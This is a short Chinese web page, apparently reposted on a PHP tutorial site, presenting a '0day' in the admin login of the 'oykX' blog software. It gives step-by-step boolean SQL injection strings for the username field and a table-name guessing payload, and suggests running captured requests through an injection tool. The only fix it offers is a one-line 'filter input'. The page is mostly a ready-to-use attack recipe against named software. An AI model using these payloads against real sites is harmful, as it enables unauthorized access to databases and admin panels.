网站地图    收藏   

主页 > 后端 > 网站安全 >

oykX博客后台post注射0day及修复 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 进入http://www.2cto.com /admin/index.aspx在帐号输入框处填123#39; or 1=1 and #39;1#39;=#39;1密码为空(也可以乱填),点击Login 提示密码错误把帐号输入框语句换成123#39; or 1=2 and #3......

进入http://www.2cto.com /admin/index.aspx
在帐号输入框处填123' or 1=1 and '1'='1
密码为空(也可以乱填),点击Login  提示密码错误
把帐号输入框语句换成123' or 1=2 and '1'='1提示用户不存在,注射漏洞由此产生了
后面猜表名:123' or (select count(*)from 表名)>0
也可以抓包注射丢进穿山甲
http://expsec.com版权所有!转载请注明出处

www.2cto.com提供修复方案:

过滤输入框输入

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论